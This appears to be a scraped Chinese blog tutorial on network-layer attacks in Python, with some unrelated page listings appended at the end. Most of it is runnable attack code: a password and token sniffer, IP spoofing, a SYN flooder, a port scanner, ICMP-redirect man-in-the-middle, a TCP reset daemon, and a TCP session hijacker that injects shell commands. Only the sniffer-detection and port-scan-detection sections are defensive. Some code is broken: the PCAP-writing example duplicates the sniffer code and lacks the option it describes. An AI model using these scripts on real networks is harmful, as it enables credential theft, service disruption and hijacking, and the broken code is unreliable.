navyofficer
navyofficer

[Python] Layer3攻击

这一部分的代码会用到如下的包:Scapy,pcapy和impacket,scapy之前用过此处不再赘述,impacket可以用下载安装包的方法进行安装,需要多说两句的是pcapy用下载安装包的方法安装会出现错误,正确的方法是直接利用命令行安装:apt-get install python-pcapy

1.A Simple Sniffer
源代码如下: 
import sys
import getopt
import pcapy
from impacket.ImpactDecoder import EthDecoder

dev = "eth0"
filter = "arp"
decoder = EthDecoder()

# This function will be called for every packet
# and just print it
def handle_packet(hdr,data):
	print decoder.decode(data)

def usage():
	print sys.argv[0] + " -i  -f "
	sys.exit(1)

#Parsing parameter
try:
	cmd_opts = "f:i:"
	opts, args = getopt.getopt(sys.argv[1:],cmd_opts)
except getopt.GetoptError:
	usage()

for opt in opts:
	if opt[0] == "-f":
		filter = opt[1]
	elif opt[0] == "-i":
		dev = opt[1]
	else:
		usage()

# Open device in promisc mode
pcap = pcapy.open_live(dev,1500,0,100)

# Set pcap filter
pcap.setfilter(filter)

# Start sniffing
pcap.loop(0, handle_packet)
程序执行过程如下:
[Python] Layer3攻击_第1张图片
此过程中捕获的数据包如下:

[Python] Layer3攻击_第2张图片


[Python] Layer3攻击_第3张图片

可见ARP请求包被嗅探,其中的信息被打印出来.

2.Reading and Writing PCAP Dump Files

此程序会嗅探网络流量并将其保存在数据包中。
如果按照默认方式运行程序,那么流量会被保存在名为sniffer.pcap的文件中。

import sys
import getopt
import pcapy
from impacket.ImpactDecoder import EthDecoder

dev = "eth0"
filter = "arp"
decoder = EthDecoder()

# This function will be called for every packet
# and just print it
def handle_packet(hdr,data):
	print decoder.decode(data)

def usage():
	print sys.argv[0] + " -i  -f "
	sys.exit(1)

#Parsing parameter
try:
	cmd_opts = "f:i:"
	opts, args = getopt.getopt(sys.argv[1:],cmd_opts)
except getopt.GetoptError:
	usage()

for opt in opts:
	if opt[0] == "-f":
		filter = opt[1]
	elif opt[0] == "-i":
		dev = opt[1]
	else:
		usage()

# Open device in promisc mode
pcap = pcapy.open_live(dev,1500,0,100)

# Set pcap filter
pcap.setfilter(filter)

# Start sniffing
pcap.loop(0, handle_packet)

程序运行过程如下:
[Python] Layer3攻击_第4张图片
数据包如下:

也可以通过-w 参数来指定数据包的名称,比如指定为sniffer1.pcap。
程序运行过程如下:
[Python] Layer3攻击_第5张图片
数据包如下:

也可以对已有的数据包进行读取(注意,如果pcap文件中是UDP包,那么程序运行时会报错)
程序运行过程如下:
[Python] Layer3攻击_第6张图片
数据包如下:
[Python] Layer3攻击_第7张图片

3.Password Sniffer
此程序嗅探所有TCP数据包,如果其中的内容匹配上了正则表达式中的模式,就将信息打印出来。
源码如下:

import sys
import re
import getopt
import pcapy
from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder

# Interface to sniff on
dev = "eth0"

# Pcap filter
filter = "tcp"

# Decoder for all layers
eth_dec = EthDecoder()
ip_dec = IPDecoder()
tcp_dec = TCPDecoder()

#Patterns that match usernames and passwords
pattern = re.compile(r"""(?P(USER|USERNAME|PASS|
			PASSWORD|LOGIN|BENUTZER|PASSWORT|AUTH|
			ACCESS|ACCESS_?KEY|SESSION|
			SESSION_?KEY|TOKEN)[=:\s].+)\b""",
			re.MULTILINE|re.IGNORECASE)

# This function will be called for every packet,decode it and
# try to find a username or password in it
def handle_packet(hdr,data):
	eth_pkt = eth_dec.decode(data)
	ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string())
	tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string())
	payload = tcp_pkt.get_data_as_string()

	match = re.search(pattern,payload)
	if not tcp_pkt.get_SYN() and not tcp_pkt.get_RST() and not tcp_pkt.get_FIN() and match and match.groupdict()['found'] != None:
		print "%s:%d -> %s:%d" % (ip_pkt.get_ip_src(),tcp_pkt.get_th_sport(),ip_pkt.get_ip_dst(),tcp_pkt.get_th_dport())
		print "\t%s\n" % (match.groupdict()['found'])

def usage():
	print sys.argv[0] + " -i  -f "
	sys.exit(1)

# Parsing parameter
try:
	cmd_opts = "f:i:"
	opts,args = getopt.getopt(sys.argv[1:],cmd_opts)
except getopt.GetoptError:
	usage()

for opt in opts:
	if opt[0] == "-f":
		filter = opt[1]
	elif opt[0] == "-i":
		dev = opt[1]
	else:
		usage()

#Start sniffing
pcap = pcapy.open_live(dev,1500,0,100)
pcap.setfilter(filter)
print "Sniffing passwords on " + str(dev)
pcap.loop(0,handle_packet)
程序运行过程截图:
[Python] Layer3攻击_第8张图片
4.Sniffer-Detection
处于混杂模式的主机不会拒绝任何数据包,并且会回复所有。因此可以构造一个ARP包,里面保存有随机的,未被占用的MAC地址。未设置混杂模式的主机会将这个包丢弃,而混杂模式的主机会对此作出响应。代码中可以使用promiscping()函数来实现如上功能。

代码如下:

import sys
from scapy.all import promiscping

if len(sys.argv) < 2:
	print sys.argv[0] + ""
	sys.exit(1)
	
promiscping(sys.argv[1])
运行过程如下:

[Python] Layer3攻击_第9张图片

5.IP-Spoofing
此代码发送一个ICMP包,换句话说就是ping指令所发出的包,其中的源IP地址是伪造的。

源代码如下:

import sys
from scapy.all import send,IP,ICMP

if len(sys.argv) < 3:
	print sys.argv[0] + "  "
	sys.exit(1)

packet = IP(src=sys.argv[1], dst=sys.argv[2]) / ICMP()
answer = send(packet)

if answer:
	answer.show()
指令的格式为python test.py <(forged)source ip> 代码的执行过程为。

[Python] Layer3攻击_第10张图片
数据包为:

数据包中10.0.3.188为伪造的IP地址,但源MAC地址是真实的。

6.SYN-Flooder
此代码会产生SYN Flood,程序的命令结构为:
test.py
程序中会构造的一虚假的源IP,源端口为1~1024的随机值,目标IP和端口可以在命令行中指定。
源代码如下:

import sys
from scapy.all import srflood,IP,TCP

if len(sys.argv) < 4:
	print sys.argv[0] + "   "
	sys.exit(0)

packet = IP(src=sys.argv[1],dst=sys.argv[2]) / TCP(sport=range(1,1024),dport=int(sys.argv[3]),flags="S")

srflood(packet,store=0)
命令执行方式如下:

可见在目标机10.0.3.88上创建了好多与10.0.3.188(构造的虚拟源IP)的连接。
[Python] Layer3攻击_第11张图片
从抓获的数据包上来看也可知有很多连接被创建。
[Python] Layer3攻击_第12张图片
7.Port-Scanning
原理是向目标发送一个SYN包,然后看我们得到的是SYN/ACK(端口开放),RST(端口关闭)还是no(端口过滤)的应答。
源码: 
import sys
from scapy.all import sr,IP,TCP

if len(sys.argv) < 2:
	print sys.argv[0] + "  "
	sys.exit(1)

#Send SYN Packets to all 1024 ports
if len(sys.argv) == 3:
	packet = IP(dst=sys.argv[1], src=sys.argv[2])
else:
	packet = IP(dst=sys.argv[1])

packet /= TCP(dport=range(1,1025), flags="S")

answered, unanswered = sr(packet,timeout=1)

res = {}

# Process unanswered packets
for packet in unanswered:
	res[packet.dport] = "filtered"

# Process answered packets
for (send,recv) in answered:
	# Got ICMP error message
	if recv.getlayer("ICMP"):
		type = recv.getlayer("ICMP").type
		code = recv.getlayer("ICMP").code
		# Port unreachable
		if code == 3 and type == 3:
			res[send.dport] = "closed"
		else:
			res[send,dport] = "Got ICMP with type " + str(type) + " and code " + str(code)
	else:
		flags = recv.getlayer("TCP").sprintf("%flags%")
		#Got SYN/ACK
		if flags == "SA":
			res[send.dport] = "open"
		#Got RST
		elif flags == "R" or flags == "RA":
			res[send.dport] = "closed"
		#Got something else
		else:
			res[send.dport] = "Got packet with flags " + str(flags)

# Print res
ports = res.keys()
ports.sort()

for port in ports:
	if res[port] != "closed":
		print str(port) + ": " + res[port]
程序运行过程:

[Python] Layer3攻击_第13张图片

8.Port-Scan Detection
程序记住所有的目标端口以及相应请求包的时间,当请求包的数量高于一个给定最大值时就把它视为port-scan。
源码:

import sys
from time import time
from scapy.all import sniff

ip_to_ports = dict()

# Nr of ports in timespan seconds
nr_of_diff_ports = 10
portscan_timespan = 10

def detect_portscan(packet):
	ip = packet.getlayer("IP")
	tcp = packet.getlayer("TCP")
	
	# Remember scanned port and time in unix format
	ip_to_ports.setdefault(ip.src, {})[str(tcp.dport)] = int(time())

	# Source IP has scanned too much different ports?
	if len(ip_to_ports[ip.src]) >= nr_of_diff_ports:
		scanned_ports = ip_to_ports[ip.src].items()

		# Check recorded time of each scan
		for (scanned_port,scan_time) in scanned_ports:
			
			# Scanned port not in timeout span? Delete it
			if scan_time + portscan_timespan < int(time()):
				del ip_to_ports[ip.src][scanned_port]

		# Still too much scanned ports?
		if len(ip_to_ports[ip.src]) >= nr_of_diff_ports:
			print "Portscan detected from "+ip.src
			print "Scanned ports "+",".join(ip_to_ports[ip.src].keys())+"\n"
			del ip_to_ports[ip.src]

if len(sys.argv) < 2:
	print sys.argv[0] + " "
	sys.exit(0)

sniff(prn=detect_portscan,filter="tcp",iface=sys.argv[1],store=0)
比如使用10.0.3.86中执行namp -sS -A 10.0.3.83,那么在10.0.3.83中运行此程序的结果如下:
[Python] Layer3攻击_第14张图片

9.ICMP-Redirection

ICMP Redirection是一种比ARP欺骗更加隐蔽的中间人攻击方式

源码:

import sys
import getopt
from scapy.all import send, IP, ICMP

# The address we send the packet to
target = None

# The address of the original gateway
old_gw = None

# The address of our desired gateway
new_gw = None

def usage():
	print sys.argv[0] + """
	-t 
	-o 
	-n """
	sys.exit(1)

#Parsing parameter
try:
	cmd_opts = "t:o:n:r:"
	opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
	usage()

for opt in opts:
	if opt[0] == "-t":
		target = opt[1]
	elif opt[0] == "-o":
		old_gw = opt[1]
	elif opt[0] == "-n":
		new_gw = opt[1]
	else:
		usage()

#Construct and send the packet
packet = IP(src=old_gw, dst=target) / ICMP(type=5, code=1, gw=new_gw) / IP(src=target, dst='0.0.0.0')
send(packet)
执行此代码:

此过程抓取的ICMP数据包如下:

[Python] Layer3攻击_第15张图片

10.RST Daemon
此程序用于将原IP和目的IP地址,源端口和目的端口进行对调,ACK的值为上一个接收到的包中SEQ+1,SEQ值为上一个接收到的包中的ACK值+1,ACK的值为上一个接收到的数据包中SEQ的值。并且设置RST位,使得连接被终断。
程序源码如下:

import sys
import getopt
import pcapy
from scapy.all import send,IP,TCP
from impacket.ImpactDecoder import EthDecoder,IPDecoder
from impacket.ImpactDecoder import TCPDecoder

dev = "eth0"
filter = ""
eth_decoder = EthDecoder()
ip_decoder = IPDecoder()
tcp_decoder = TCPDecoder()

def handle_packet(hdr,data):
	eth = eth_decoder.decode(data)
	ip = ip_decoder.decode(eth.get_data_as_string())
	tcp = tcp_decoder.decode(ip.get_data_as_string())

	if not tcp.get_SYN() and not tcp.get_RST() and not tcp.get_FIN() and tcp.get_ACK():
		packet = IP(src=ip.get_ip_dst(),dst=ip.get_ip_src()) / TCP(sport=tcp.get_th_dport(),dport=tcp.get_th_sport(),seq=tcp.get_th_ack(),ack=tcp.get_th_seq()+1,flags="R")
		send(packet,iface=dev)
		print "RST %s:%d -> %s:%d" % (ip.get_ip_src(),tcp.get_th_sport(),ip.get_ip_dst(),tcp.get_th_dport())

def usage():
	print sys.argv[0] + " -i  -f "
	sys.exit(1)

try:
	cmd_opts = "f:i:"
	opts,args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
	usage()

for opt in opts:
	if opt[0] == "-f":
		filter = opt[1]
	elif opt[0] == "-i":
		dev = opt[1]
	else:
		usage()

pcap = pcapy.open_live(dev,1500,1,100)

if filter:
	filter = "tcp and "+filter
else:
	filter = "tcp"

pcap.setfilter(filter)
print "Resetting all TCP connections on %s matching filter %s " % (dev,filter)
pcap.loop(0,handle_packet)
实验过程如下:
正常登录FTP,数据包如下:
[Python] Layer3攻击_第16张图片
运行程序,再次登录FTP发现无法登陆,此时的数据包如下:
[Python] Layer3攻击_第17张图片
程序的运行过程如下,可见程序捕获到了此FTP登录过程:
[Python] Layer3攻击_第18张图片
11. Automatic Hijack Daemon
程序可以有很多命令选项,但是最基本的是python test.py -p -s
表示被劫持的端口号,表示被劫持的IP
源码为: 
import sys
import getopt
from scapy.all import send,sniff,IP,TCP

dev = "eth0"
srv_port = None
srv_ip = None
client_ip = None
grep = None
inject_data = "echo 'haha' > /tmp/hacked\n"
hijack_data = {}

def handle_packet(packet):
	ip = packet.getlayer("IP")
	tcp = packet.getlayer("TCP")
	flags = tcp.sprintf("%flags%")

	print "Got packet %s:%d -> %s:%d [%s]" % (ip.src, tcp.sport, ip.dst, tcp.dport, flags)

	# Check if this is a hijackable packet
	if tcp.sprintf("%flags%") == "A" or tcp.sprintf("%flags%") == "PA":
		already_hijacked = hijack_data.get(ip.dst, {}).get('hijacked')

		# The packet is from server to client
		if tcp.sport == srv_port and ip.src == srv_ip and not already_hijacked:

			print "Got server sequence " + str(tcp.seq)
			print "Got client sequence " + str(tcp.ack) + "\n"

			# Found the payload?
			if grep in str(tcp.payload):
				hijack_data.setdefault(ip.dst, {})['hijack'] = True
				print "Found payload " + str(tcp.payload)
			elif not grep:
				hijack_data.setdefault(ip.dst, {})['hijack'] = True
			if hijack_data.setdefault(ip.dst, {}).get('hijack'):
				print "Hijacking %s:%d -> %s:%d" % (ip.dst, tcp.dport, ip.src, srv_port)

				# Spoof packet from client
				packet = IP(src=ip.dst, dst=ip.src)/TCP(sport=tcp.dport,dport=srv_port,seq=tcp.ack+len(inject_data),ack=tcp.seq+1,flags="PA")/inject_data
				send(packet, iface=dev)
				hijack_data[ip.dst]['hijacked'] = True

def usage():
	print sys.argv[0]
	print """
	-c  (optional)
	-d  (optional)
	-g  (optional)
	-i  (optional)
	-p 
	-s 
	"""
	sys.exit(1)

try:
	cmd_opts = "c:d:g:i:p:s:"
	opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
	usage()

for opt in opts:
	if opt[0] == "-c":
		client_ip = opt[1]
	elif opt[0] == "-d":
		inject_data = opt[1]
	elif opt[0] == "-g":
		grep = opt[1]
	elif opt[0] == "-i":
		dev = opt[1]
	elif opt[0] == "-p":
		srv_port = int(opt[1])
	elif opt[0] == "-s":
		srv_ip = opt[1]
	else:
		usage()

if not srv_ip and not srv_port:
	usage()

if client_ip:
	print "Hijacking TCP connections from %s to %s on port %d" % (client_ip,srv_ip,srv_port)
	filter = "tcp and port " + str(srv_port) + " and host "+srv_ip+"and host "+client_ip
else:
	print "Hijacking all TCP connections to %s on port %d" % (srv_ip,srv_port)
	filter = "tcp and port " + str(srv_port) + " and host "+srv_ip
sniff(iface=dev, store=0, filter=filter, prn=handle_packet)
代码执行过程如下:
[Python] Layer3攻击_第19张图片

你可能感兴趣的:(python)

  • 理解Gunicorn:Python WSGI服务器的基石 范范0825 ipythonlinux运维
    理解Gunicorn:PythonWSGI服务器的基石介绍Gunicorn,全称GreenUnicorn,是一个为PythonWSGI(WebServerGatewayInterface)应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具,Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置,帮助初学者快速上手。1.什么是Gunico
  • Python数据分析与可视化实战指南 William数据分析 pythonpython数据
    在数据驱动的时代,Python因其简洁的语法、强大的库生态系统以及活跃的社区,成为了数据分析与可视化的首选语言。本文将通过一个详细的案例,带领大家学习如何使用Python进行数据分析,并通过可视化来直观呈现分析结果。一、环境准备1.1安装必要库在开始数据分析和可视化之前,我们需要安装一些常用的库。主要包括pandas、numpy、matplotlib和seaborn等。这些库分别用于数据处理、数学
  • python os.environ 江湖偌大 python深度学习
    os.environ['TF_CPP_MIN_LOG_LEVEL']='0'#默认值,输出所有信息os.environ['TF_CPP_MIN_LOG_LEVEL']='1'#屏蔽通知信息(INFO)os.environ['TF_CPP_MIN_LOG_LEVEL']='2'#屏蔽通知信息和警告信息(INFO\WARNING)os.environ['TF_CPP_MIN_LOG_LEVEL']='
  • Python中os.environ基本介绍及使用方法 鹤冲天Pro #Pythonpython服务器开发语言
    文章目录python中os.environos.environ简介os.environ进行环境变量的增删改查python中os.environ的使用详解1.简介2.key字段详解2.1常见key字段3.os.environ.get()用法4.环境变量的增删改查和判断是否存在4.1新增环境变量4.2更新环境变量4.3获取环境变量4.4删除环境变量4.5判断环境变量是否存在python中os.envi
  • Pyecharts数据可视化大屏:打造沉浸式数据分析体验 我的运维人生 信息可视化数据分析数据挖掘运维开发技术共享
    Pyecharts数据可视化大屏:打造沉浸式数据分析体验在当今这个数据驱动的时代,如何将海量数据以直观、生动的方式展现出来,成为了数据分析师和企业决策者关注的焦点。Pyecharts,作为一款基于Python的开源数据可视化库,凭借其丰富的图表类型、灵活的配置选项以及高度的定制化能力,成为了构建数据可视化大屏的理想选择。本文将深入探讨如何利用Pyecharts打造数据可视化大屏,并通过实际代码案例
  • Python教程:一文了解使用Python处理XPath 旦莫 Python进阶python开发语言
    目录1.环境准备1.1安装lxml1.2验证安装2.XPath基础2.1什么是XPath?2.2XPath语法2.3示例XML文档3.使用lxml解析XML3.1解析XML文档3.2查看解析结果4.XPath查询4.1基本路径查询4.2使用属性查询4.3查询多个节点5.XPath的高级用法5.1使用逻辑运算符5.2使用函数6.实战案例6.1从网页抓取数据6.1.1安装Requests库6.1.2代
  • python os.environ_python os.environ 读取和设置环境变量 weixin_39605414 pythonos.environ
    >>>importos>>>os.environ.keys()['LC_NUMERIC','GOPATH','GOROOT','GOBIN','LESSOPEN','SSH_CLIENT','LOGNAME','USER','HOME','LC_PAPER','PATH','DISPLAY','LANG','TERM','SHELL','J2REDIR','LC_MONETARY','QT_QPA
  • 使用Faiss进行高效相似度搜索 llzwxh888 faisspython
    在现代AI应用中,快速和高效的相似度搜索是至关重要的。Faiss(FacebookAISimilaritySearch)是一个专门用于快速相似度搜索和聚类的库,特别适用于高维向量。本文将介绍如何使用Faiss来进行相似度搜索,并结合Python代码演示其基本用法。什么是Faiss?Faiss是一个由FacebookAIResearch团队开发的开源库,主要用于高维向量的相似性搜索和聚类。Faiss
  • python是什么意思中文-在python中%是什么意思 编程大乐趣
    Python中%有两种:1、数值运算:%代表取模,返回除法的余数。如:>>>7%212、%操作符(字符串格式化,stringformatting),说明如下:%[(name)][flags][width].[precision]typecode(name)为命名flags可以有+,-,''或0。+表示右对齐。-表示左对齐。''为一个空格,表示在正数的左侧填充一个空格,从而与负数对齐。0表示使用0填
  • Day1笔记-Python简介&标识符和关键字&输入输出 ~在杰难逃~ Pythonpython开发语言大数据数据分析数据挖掘
    大家好,从今天开始呢,杰哥开展一个新的专栏,当然,数据分析部分也会不定时更新的,这个新的专栏主要是讲解一些Python的基础语法和知识,帮助0基础的小伙伴入门和学习Python,感兴趣的小伙伴可以开始认真学习啦!一、Python简介【了解】1.计算机工作原理编程语言就是用来定义计算机程序的形式语言。我们通过编程语言来编写程序代码,再通过语言处理程序执行向计算机发送指令,让计算机完成对应的工作,编程
  • python八股文面试题分享及解析(1) Shawn________ python
    #1.'''a=1b=2不用中间变量交换a和b'''#1.a=1b=2a,b=b,aprint(a)print(b)结果:21#2.ll=[]foriinrange(3):ll.append({'num':i})print(11)结果:#[{'num':0},{'num':1},{'num':2}]#3.kk=[]a={'num':0}foriinrange(3):#0,12#可变类型,不仅仅改变
  • 每日算法&面试题,大厂特训二十八天——第二十天(树) 肥学 ⚡算法题⚡面试题每日精进java算法数据结构
    目录标题导读算法特训二十八天面试题点击直接资料领取导读肥友们为了更好的去帮助新同学适应算法和面试题,最近我们开始进行专项突击一步一步来。上一期我们完成了动态规划二十一天现在我们进行下一项对各类算法进行二十八天的一个小总结。还在等什么快来一起肥学进行二十八天挑战吧!!特别介绍小白练手专栏,适合刚入手的新人欢迎订阅编程小白进阶python有趣练手项目里面包括了像《机器人尬聊》《恶搞程序》这样的有趣文章
  • Python快速入门 —— 第三节:类与对象 孤华暗香 Python快速入门python开发语言
    第三节:类与对象目标:了解面向对象编程的基础概念,并学会如何定义类和创建对象。内容:类与对象:定义类:class关键字。类的构造函数:__init__()。类的属性和方法。对象的创建与使用。示例:classStudent:def__init__(self,name,age,major):self.name&#
  • pyecharts——绘制柱形图折线图 2224070247 信息可视化pythonjava数据可视化
    一、pyecharts概述自2013年6月百度EFE(ExcellentFrontEnd)数据可视化团队研发的ECharts1.0发布到GitHub网站以来,ECharts一直备受业界权威的关注并获得广泛好评,成为目前成熟且流行的数据可视化图表工具,被应用到诸多数据可视化的开发领域。Python作为数据分析领域最受欢迎的语言,也加入ECharts的使用行列,并研发出方便Python开发者使用的数据
  • Python 实现图片裁剪(附代码) | Python工具 剑客阿良_ALiang
    前言本文提供将图片按照自定义尺寸进行裁剪的工具方法,一如既往的实用主义。环境依赖ffmpeg环境安装,可以参考我的另一篇文章:windowsffmpeg安装部署_阿良的博客-CSDN博客本文主要使用到的不是ffmpeg,而是ffprobe也在上面这篇文章中的zip包中。ffmpy安装:pipinstallffmpy-ihttps://pypi.douban.com/simple代码不废话了,上代码
  • 【华为OD技术面试真题 - 技术面】- python八股文真题题库(4) 算法大师 华为od面试python
    华为OD面试真题精选专栏:华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选**1.Python中的`with`**用途和功能自动资源管理示例:文件操作上下文管理协议示例代码工作流程解析优点2.\_\_new\_\_和**\_\_init\_\_**区别__new____init__区别总结3.**切片(Slicing)操作**基本切片语法
  • python os 环境变量 CV矿工 python开发语言numpy
    环境变量:环境变量是程序和操作系统之间的通信方式。有些字符不宜明文写进代码里,比如数据库密码,个人账户密码,如果写进自己本机的环境变量里,程序用的时候通过os.environ.get()取出来就行了。os.environ是一个环境变量的字典。环境变量的相关操作importos"""设置/修改环境变量:os.environ[‘环境变量名称’]=‘环境变量值’#其中key和value均为string类
  • Python爬虫解析工具之xpath使用详解 eqa11 python爬虫开发语言
    文章目录Python爬虫解析工具之xpath使用详解一、引言二、环境准备1、插件安装2、依赖库安装三、xpath语法详解1、路径表达式2、通配符3、谓语4、常用函数四、xpath在Python代码中的使用1、文档树的创建2、使用xpath表达式3、获取元素内容和属性五、总结Python爬虫解析工具之xpath使用详解一、引言在Python爬虫开发中,数据提取是一个至关重要的环节。xpath作为一门
  • 【华为OD技术面试真题 - 技术面】- python八股文真题题库(1) 算法大师 华为od面试python
    华为OD面试真题精选专栏:华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.数据预处理流程数据预处理的主要步骤工具和库2.介绍线性回归、逻辑回归模型线性回归(LinearRegression)模型形式:关键点:逻辑回归(LogisticRegression)模型形式:关键点:参数估计与评估:3.python浅拷贝及深拷贝浅拷贝(Shal
  • nosql数据库技术与应用知识点 皆过客,揽星河 NoSQLnosql数据库大数据数据分析数据结构非关系型数据库
    Nosql知识回顾大数据处理流程数据采集(flume、爬虫、传感器)数据存储(本门课程NoSQL所处的阶段)Hdfs、MongoDB、HBase等数据清洗(入仓)Hive等数据处理、分析(Spark、Flink等)数据可视化数据挖掘、机器学习应用(Python、SparkMLlib等)大数据时代存储的挑战(三高)高并发(同一时间很多人访问)高扩展(要求随时根据需求扩展存储)高效率(要求读写速度快)
  • 《Python数据分析实战终极指南》 xjt921122 python数据分析开发语言
    对于分析师来说,大家在学习Python数据分析的路上,多多少少都遇到过很多大坑**,有关于技能和思维的**:Excel已经没办法处理现有的数据量了,应该学Python吗?找了一大堆Python和Pandas的资料来学习,为什么自己动手就懵了?跟着比赛类公开数据分析案例练了很久,为什么当自己面对数据需求还是只会数据处理而没有分析思路?学了对比、细分、聚类分析,也会用PEST、波特五力这类分析法,为啥
  • Python中深拷贝与浅拷贝的区别 yuxiaoyu.
    转自:http://blog.csdn.net/u014745194/article/details/70271868定义:在Python中对象的赋值其实就是对象的引用。当创建一个对象,把它赋值给另一个变量的时候,python并没有拷贝这个对象,只是拷贝了这个对象的引用而已。浅拷贝:拷贝了最外围的对象本身,内部的元素都只是拷贝了一个引用而已。也就是,把对象复制一遍,但是该对象中引用的其他对象我不复
  • Python开发常用的三方模块如下: 换个网名有点难 python开发语言
    Python是一门功能强大的编程语言,拥有丰富的第三方库,这些库为开发者提供了极大的便利。以下是100个常用的Python库,涵盖了多个领域:1、NumPy,用于科学计算的基础库。2、Pandas,提供数据结构和数据分析工具。3、Matplotlib,一个绘图库。4、Scikit-learn,机器学习库。5、SciPy,用于数学、科学和工程的库。6、TensorFlow,由Google开发的开源机
  • Python编译器 鹿鹿~ Python编译器Pythonpython开发语言后端
    嘿嘿嘿我又来了啊有些小盆友可能不知道Python其实是有编译器的,也就是PyCharm。你们可能会问到这个是干嘛的又不可以吃也不可以穿好像没有什么用,其实你还说对了这个还真的不可以吃也不可以穿,但是它用来干嘛的呢。用来编译你所打出的代码进行运行(可能这里说的有点不对但是只是个人认为)现在我们来说说PyCharm是用来干嘛的。PyCharm是一种PythonIDE,带有一整套可以帮助用户在使用Pyt
  • 一文掌握python面向对象魔术方法(二) 程序员neil pythonpython开发语言
    接上篇:一文掌握python面向对象魔术方法(一)-CSDN博客目录六、迭代和序列化:1、__iter__(self):定义迭代器,使得类可以被for循环迭代。2、__getitem__(self,key):定义索引操作,如obj[key]。3、__setitem__(self,key,value):定义赋值操作,如obj[key]=value。4、__delitem__(self,key):定义
  • 一文掌握python常用的list(列表)操作 程序员neil pythonpython开发语言
    目录一、创建列表1.直接创建列表:2.使用list()构造器3.使用列表推导式4.创建空列表二、访问列表元素1.列表支持通过索引访问元素,索引从0开始:2.还可以使用切片操作访问列表的一部分:三、修改列表元素四、添加元素1.append():在末尾添加元素2.insert():在指定位置插入元素五、删除元素1.del:删除指定位置的元素2.remove():删除指定值的第一个匹配项3.pop():
  • Python实现简单的机器学习算法 master_chenchengg pythonpython办公效率python开发IT
    Python实现简单的机器学习算法开篇:初探机器学习的奇妙之旅搭建环境:一切从安装开始必备工具箱第一步:安装Anaconda和JupyterNotebook小贴士:如何配置Python环境变量算法初体验:从零开始的Python机器学习线性回归:让数据说话数据准备:从哪里找数据编码实战:Python实现线性回归模型评估:如何判断模型好坏逻辑回归:从分类开始理论入门:什么是逻辑回归代码实现:使用skl
  • python中的深拷贝与浅拷贝 anshejd70787 python
    深拷贝和浅拷贝浅拷贝的时候,修改原来的对象,浅拷贝的对象不会发生改变。1、对象的赋值对象的赋值实际上是对象之间的引用:当创建一个对象,然后将这个对象赋值给另外一个变量的时候,python并没有拷贝这个对象,而只是拷贝了这个对象的引用。当对对象做赋值或者是参数传递或者作为返回值的时候,总是传递原始对象的引用,而不是一个副本。如下所示:>>>aList=["kel","abc",123]>>>bLis
  • 用Python实现简单的猜数字游戏 程序媛了了 python游戏java
    猜数字游戏代码:importrandomdefpythonit():a=random.randint(1,100)n=int(input("输入你猜想的数字:"))whilen!=a:ifn>a:print("很遗憾,猜大了")n=int(input("请再次输入你猜想的数字:"))elifna::如果玩家猜的数字n大于随机数字a,则输出"很遗憾,猜大了",并提示玩家再次输入。elifn
  • 用Python实现读取统计单词个数 程序媛了了 python游戏java
    完整实例代码:fromcollectionsimportCounterdefpythonit():danci={}withopen("pythonit.txt","r",encoding="utf-8")asf:foriinf:words=i.strip().split()forwordinwords:ifwordnotindanci:danci[word]=1else:danci[word]+=
  • Java实现的简单双向Map,支持重复Value superlxw1234 java双向map
    关键字:Java双向Map、DualHashBidiMap     有个需求,需要根据即时修改Map结构中的Value值,比如,将Map中所有value=V1的记录改成value=V2,key保持不变。   数据量比较大,遍历Map性能太差,这就需要根据Value先找到Key,然后去修改。   即:既要根据Key找Value,又要根据Value
  • PL/SQL触发器基础及例子 百合不是茶 oracle数据库触发器PL/SQL编程
      触发器的简介; 触发器的定义就是说某个条件成立的时候,触发器里面所定义的语句就会被自动的执行。因此触发器不需要人为的去调用,也不能调用。触发器和过程函数类似 过程函数必须要调用,   一个表中最多只能有12个触发器类型的,触发器和过程函数相似 触发器不需要调用直接执行, 触发时间:指明触发器何时执行,该值可取: before:表示在数据库动作之前触发
  • [时空与探索]穿越时空的一些问题 comsci 问题
          我们还没有进行过任何数学形式上的证明,仅仅是一个猜想.....       这个猜想就是; 任何有质量的物体(哪怕只有一微克)都不可能穿越时空,该物体强行穿越时空的时候,物体的质量会与时空粒子产生反应,物体会变成暗物质,也就是说,任何物体穿越时空会变成暗物质..(暗物质就我的理
  • easy ui datagrid上移下移一行 商人shang js上移下移easyuidatagrid
    /** * 向上移动一行 * * @param dg * @param row */ function moveupRow(dg, row) { var datagrid = $(dg); var index = datagrid.datagrid("getRowIndex", row); if (isFirstRow(dg, row)) {
  • Java反射 oloz 反射
    本人菜鸟,今天恰好有时间,写写博客,总结复习一下java反射方面的知识,欢迎大家探讨交流学习指教 首先看看java中的Class package demo; public class ClassTest { /*先了解java中的Class*/ public static void main(String[] args) { //任何一个类都
  • springMVC 使用JSR-303 Validation验证 杨白白 springmvc
    JSR-303是一个数据验证的规范,但是spring并没有对其进行实现,Hibernate Validator是实现了这一规范的,通过此这个实现来讲SpringMVC对JSR-303的支持。 JSR-303的校验是基于注解的,首先要把这些注解标记在需要验证的实体类的属性上或是其对应的get方法上。 登录需要验证类 public class Login { @NotEmpty
  • log4j 香水浓 log4j
    log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, HTML, DATABASE #log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, ROLLINGFILE, HTML #console log4j.appender.STDOUT=org.apache.log4j.ConsoleAppender log4
  • 使用ajax和history.pushState无刷新改变页面URL agevs jquery框架Ajaxhtml5chrome
    表现 如果你使用chrome或者firefox等浏览器访问本博客、github.com、plus.google.com等网站时,细心的你会发现页面之间的点击是通过ajax异步请求的,同时页面的URL发生了了改变。并且能够很好的支持浏览器前进和后退。 是什么有这么强大的功能呢? HTML5里引用了新的API,history.pushState和history.replaceState,就是通过
  • centos中文乱码 AILIKES centosOSssh
